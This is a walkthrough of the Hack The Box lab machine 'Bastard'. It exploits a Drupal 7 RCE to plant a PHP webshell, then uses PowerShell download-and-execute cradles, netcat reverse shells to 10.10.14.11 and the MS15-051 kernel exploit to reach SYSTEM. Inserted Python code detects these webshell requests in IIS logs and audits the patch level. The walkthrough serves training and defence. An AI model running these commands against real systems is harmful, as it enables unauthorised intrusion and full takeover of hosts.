
Hack The Box: Bastard

Difficulty: Medium
Machine Creator: ch4p
Tools Used:

NMAP
Droopescan
Searchsploit
PHP
Burp Suite
Remote Code Execution
Powershell Empire: Powerup.ps1
Sherlock
Netcat

Task: To find User.txt and Root.txt
Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC 10.10.10.9


Looking at the nmap results we can see this is Microsoft IIS 7.5, which ships with Windows Server 2008 R2. We can also see that it is hosting a Drupal 7 website.

HTTP – Drupal


If we open this web page in a browser we can see this is in fact a Drupal instance.

Droopescan

For Drupal we can use a tool called droopescan. We can install it with pip, the Python package installer.

apt-get install python-pip
pip install droopescan

Now we can run droopescan against the remote server. This will take a while to finish.

droopescan scan drupal -u http://10.10.10.9


The results from the scan are not too helpful, but we do get the exact version of Drupal.

Searchsploit

We know this is a Drupal 7 server, so let's use searchsploit to see if there are any known vulnerabilities we may be able to use.

searchsploit drupal


Our search returns everything for Drupal, and we can see one called 7.x Remote Code Execution (RCE).

Let's copy the exploit to our working directory.

cp /usr/share/exploitdb/exploits/php/webapps/41564.php .

We need to manually edit this exploit, which is written in PHP.
First install php-curl:

apt-get install php-curl


Edit everything highlighted in yellow: change the URL and add the PHP code that will be executed on the server.


After running our exploit we get an error, so we need to troubleshoot it.

Burp Suite

Let's set up port forwarding in Burp so that everything sent to localhost:1337 is forwarded to 10.10.10.9:80.


Click on Proxy, then go to the Options tab. Click Add and on the Binding tab put in a random unused port (1337 in this example).

Now set up the request handling.


Under Request handling, set "Redirect to host" to 10.10.10.9 and "Redirect to port" to 80. Click OK.


We can test this now: if we type 127.0.0.1:1337 into the browser, it takes us to the remote Drupal page.

Now we need to update our exploit to route through the proxy.


We need to change $url to localhost with the port we specified.


We also want to make one change in the Options tab under Intercept Client Requests: make sure "Intercept requests based on the following rules" is checked and the File extension rule is unchecked.


If we run our code and check the HTTP history in Burp we can see a 404 Not Found error.


Let's send this POST request to Repeater: right click on the request and choose Send to Repeater.


After some trial and error I found that if we edit the POST path to rest and click Go we get a 200 OK.


We need to edit our exploit: change the URL back to 10.10.10.9 and set endpoint_path to /rest.

Exploit Execution


If we run the exploit now we get a file successfully written on the remote server.


Now we can verify the upload by going to http://10.10.10.9/exploit.php, where we see a blank page. There are no errors, so we know the file exists.

Remote Code Execution


To get remote code execution from our webshell we just need to add the ?exec= parameter followed by the command we want to run. In this example I ran dir to get a directory listing.


If we run our RCE with systeminfo we can see the OS version and the hotfixes. A Google search will show that this machine is missing a service pack and has not been updated; with Service Pack 1 the OS Version would show 6.1.7601.

Powershell Empire

We can look for privilege escalation vulnerabilities using PowerUp from PowerShell Empire.
Let's download PowerShell Empire.

git clone https://github.com/EmpireProject/Empire.git

Now that we have Empire downloaded, let's copy PowerUp.ps1 so we can edit it.

cp Empire/data/module_source/privesc/PowerUp.ps1 .


PowerUp.ps1 was made to run inside Empire, so we need to add "Invoke-AllChecks" at the bottom of the file and save.


Let's start a simple Python HTTP server.

Now we need to pull the PowerUp.ps1 from our web server and execute on the remote machine.

In the webshell we can add this command.

http://10.10.10.9/exploit.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.11:8000/PowerUp.ps1') | powershell -noprofile -


We can see that PowerUp was downloaded from our Python HTTP server and executed.


After a couple of minutes we can see the results from PowerUp.ps1.

Looking at the results we can see "access denied", which tells us that we don't have admin rights.

Going through the results there is nothing that can help us elevate our permissions.

Sherlock

Let's try finding a vulnerability using Sherlock.ps1.

wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1


Just like before we need to edit the end of the file this time with Find-AllVulns.

We can copy and execute Sherlock the same way we did PowerUp.

10.10.10.9/exploit.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.11:8000/Sherlock.ps1') | powershell -noprofile -


After running Sherlock from our webshell we get a list of possible vulnerabilities.

Reverse Shell Netcat

Before we do our privilege escalation we need a remote shell. We can get one with the x64 version of netcat.

wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip

Unzip the netcat files so we can upload and run them.

Set up our netcat listener.

nc -lvnp 8081

Make sure the Python SimpleHTTPServer is running.

python -m SimpleHTTPServer

Enter the following URL in the browser to upload netcat x64 and create a reverse shell.

http://10.10.10.9/exploit.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.14.11 8081


As you can see, when we entered the URL in the browser the remote server issued a GET to our Python HTTP server to download nc64.exe, and after the download a reverse shell was created.


This netcat shell is running as a low-privilege user.
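From the defender's side, every one of these webshell requests lands in the IIS W3C log. The following Python is an added example, not part of the original post, that runs simple detection logic over constructed log lines mirroring the requests above (the fexec/fupload parameter names, the PowerShell download cradle, the netcat upload); the field layout and marker lists are assumptions.

```python
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not captured from the box) reproducing the
# requests this walkthrough sends to the dropped exploit.php webshell, plus two benign lines.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2017-03-19 10:15:02 10.10.10.9 GET /exploit.php fexec=dir 80 10.10.14.11 200
2017-03-19 10:16:40 10.10.10.9 GET /exploit.php fexec=echo+IEX(New-Object+Net.WebClient).DownloadString('http://10.10.14.11:8000/PowerUp.ps1')+|+powershell+-noprofile+- 80 10.10.14.11 200
2017-03-19 10:20:11 10.10.10.9 GET /exploit.php fupload=nc64.exe&fexec=nc64.exe+-e+cmd+10.10.14.11+8081 80 10.10.14.11 200
2017-03-19 10:21:00 10.10.10.9 GET /index.php q=node/1 80 10.10.14.5 200
2017-03-19 10:21:05 10.10.10.9 POST /rest/user/login - 80 10.10.14.11 200
"""

WEBSHELL_PARAMS = {"fexec", "fupload"}   # parameter names of the webshell used on this page
CRADLE_MARKERS = ("downloadstring", "iex(", "invoke-expression", "powershell")
NETCAT_MARKERS = ("nc64.exe", "nc.exe", " -e cmd")

def parse_iis_log(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = []
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
        elif raw.startswith("#") or not raw.strip():
            continue
        else:
            parts = raw.split(" ")          # queries are URL-encoded, so no literal spaces
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))

def find_webshell_activity(text):
    """Return (timestamp, client, stem, reasons) for each suspicious request."""
    alerts = []
    for rec in parse_iis_log(text):
        query = "" if rec["cs-uri-query"] == "-" else unquote_plus(rec["cs-uri-query"])
        names = {p.split("=", 1)[0] for p in query.split("&") if p}
        low = query.lower()
        reasons = []
        hit = sorted(names & WEBSHELL_PARAMS)
        if rec["cs-uri-stem"].endswith(".php") and hit:
            reasons.append("webshell parameter " + ",".join(hit))
        if any(m in low for m in CRADLE_MARKERS):
            reasons.append("powershell download cradle")
        if any(m in low for m in NETCAT_MARKERS):
            reasons.append("netcat reverse shell")
        if reasons:
            alerts.append((rec["date"] + " " + rec["time"], rec["c-ip"], rec["cs-uri-stem"], reasons))
    return alerts
```

Run it over a real IIS log directory by reading each file into find_webshell_activity; the benign Drupal and /rest lines produce no alerts, the three webshell lines do.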

Privilege Escalation


If we look back at the Sherlock PowerShell scan we did earlier, we already know this is a default install with no patching, so it should be vulnerable to MS15-051.

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051


From the GitHub page we need to download the "MS15-051-KB3045171.zip" file and extract it.

We need the 64-bit version, MS15-051x64.exe.
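A defender-side counterpart to the systeminfo check from the Remote Code Execution section, added here as an example (not part of the original walkthrough or of the exploit repository): it parses constructed systeminfo output and reports whether the host is still on the 6.1.7600 RTM build and whether the KB3045171 hotfix for MS15-051 is installed. The sample outputs and function names are assumptions for illustration.

```python
import re

MS15_051_KB = "KB3045171"   # hotfix that closes MS15-051 (the KB in the zip name above)

# Constructed `systeminfo` excerpts (not captured from the box). Build 7600 is
# Server 2008 R2 RTM; Service Pack 1 reports 6.1.7601.
UNPATCHED = """\
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: KB976902
"""

PATCHED = """\
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB976902
                           [02]: KB3045171
"""

def parse_systeminfo(text):
    """Return (os_version, build_number, set of installed KB ids)."""
    version, build, kbs = None, None, set()
    for line in text.splitlines():
        m = re.match(r"OS Version:\s+(\d+\.\d+\.(\d+))", line)
        if m:
            version, build = m.group(1), int(m.group(2))
        kbs.update(re.findall(r"\bKB\d+\b", line))
    return version, build, kbs

def audit_patch_level(text):
    """List why a 2008 R2 host should be treated as exposed to MS15-051.

    A missing KB is a strong signal on a host like this one that has never been
    updated; where later rollups supersede the KB, treat the result as a triage
    hint rather than a verdict."""
    version, build, kbs = parse_systeminfo(text)
    findings = []
    if build is not None and build < 7601:
        findings.append("Service Pack 1 missing (OS Version %s, SP1 shows 6.1.7601)" % version)
    if MS15_051_KB not in kbs:
        findings.append("%s for MS15-051 not installed" % MS15_051_KB)
    return findings
```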

MS15-051 exploit

10.10.10.9/exploit.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe whoami


Similar to the netcat upload, we can upload this exploit and run it. In this example I'm running whoami and we can see that we're running as SYSTEM.

Privileged Netcat

Similar to the previous netcat step, we're going to execute the existing nc file through the exploit and create a second reverse shell running as SYSTEM.

nc -lvnp 8082

10.10.10.9/exploit.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe "nc64.exe -e cmd 10.10.14.11 8082"


After running the exploit against the new netcat listener we now have a SYSTEM-level reverse shell.

User.txt and Root.txt


With our new SYSTEM netcat shell we can read the contents of user.txt.


And we can view the contents of root.txt.txt.